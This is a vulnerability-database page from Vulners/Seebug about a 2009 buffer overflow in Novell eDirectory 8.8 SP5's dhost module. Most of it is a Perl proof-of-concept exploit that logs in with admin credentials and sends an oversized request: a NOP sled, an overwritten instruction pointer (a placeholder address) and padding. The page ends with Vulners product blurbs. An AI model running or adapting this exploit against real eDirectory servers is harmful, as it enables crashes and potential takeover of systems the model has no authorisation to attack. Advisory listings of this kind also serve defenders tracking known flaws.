Lucene search
K

Novell eDirectory '/dhost/modules?L:'缓冲区溢出漏洞

🗓️ 28 Oct 2009 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 16 Views

Novell eDirectory dhost module buffer overflow vulnerabilit

Code

                                                #PoC for Vulnerability:
#!usr\bin\perl
#Novell eDirectory 8.8 SP5 BoF Vuln - 0day
#Vulnerability found in Hellcode Labs.
#karak0rsan || murderkey
#info[at]hellcode.net || www.hellcode.net
#to GamaSEC: "please continue to discover and publish XSS BUGS.. you can just do that ;)"
#http://www.youtube.com/watch?v=6bloyjV-Hhs
use WWW::Mechanize;
use LWP::Debug qw(+);
use HTTP::Cookies;
$target=$ARGV[0];
if(!$ARGV[0]){
        print "Novell eDirectory 8.8 SP5 Exploit\n";
        print "Hellcode Research || Hellcode.net\n";
        print "Usage:perl $0 [target]\n";
 
exit();
}
$login_url = "$target/_LOGIN_SERVER_";
$url = "$target/dhost/";
$vuln = "modules?L:";
$nop = "\x90" x 1668;
$eip = "\xef\xbe\xad\xde";
$data = "B" x 235;
$hellcode = $vuln.$nop.$eip.$data;
########Write your usr and pwd########
   $username = "Admin.context";
    $password = "1234";
my $mechanize = WWW::Mechanize->new();
$mechanize->cookie_jar(HTTP::Cookies->new(file => "$cookie_file",autosave => 1));
$mechanize->timeout($url_timeout);
$res = $mechanize->request(HTTP::Request->new('GET', "$login_url"));
    $mechanize->submit_form(
                  form_name => "authenticator",
                  fields    => {       
           
                     usr => $username,
                     pwd => $password},
                     button => 'Login');
$response2 = $mechanize->get("$url$hellcode");
 
                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

28 Oct 2009 00:00Current
6.9Medium risk
Vulners AI Score6.9
16